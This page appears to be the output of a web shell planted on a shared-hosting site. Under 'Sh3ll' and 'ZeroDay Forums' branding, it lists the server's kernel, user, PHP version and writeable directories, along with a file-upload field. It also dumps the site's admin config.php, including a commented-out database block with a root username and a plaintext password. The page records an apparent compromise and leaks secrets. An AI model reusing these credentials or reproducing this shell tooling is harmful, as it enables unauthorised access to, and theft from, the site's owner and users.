Sh3ll
OdayForums


Server : LiteSpeed
System : Linux premium84.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : claqxcrl ( 523)
PHP Version : 8.1.32
Disable Function : NONE
Directory :  /home/claqxcrl/www/ondjoweb/admin/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/claqxcrl/www/ondjoweb/admin/includes/config.php
<?php 

/*AUTOLOAD DE CLASSES */
spl_autoload_register(
    function ($nomClasse) {
    require_once '../../classes/'.$nomClasse.'.php';
}
);
#CAMINHO DAS IMAGENS
$imgCaminho = 'ondjoweb/admin/postimages/';
$logosCaminho = 'images/common/';
$imgJogadorCaminho = 'ondjoweb/admin/postimages/jogadores/';
#INSTANCIA DE OBJECTOS DE CLASSES
$post = new Posts();
?>  

<?php
/*
define('DB_SERVER','localhost');
define('DB_USER','root');
define('DB_PASS' ,'#375%Ondjo!');
define('DB_NAME','claque_geraldb');
*/
$con = mysqli_connect(DB_SERVER,DB_USER,DB_PASS,DB_NAME);
// Check connection
if (mysqli_connect_errno())
{
 echo "Falha de ligação: " . mysqli_connect_error();
}
?>

ZeroDay Forums Mini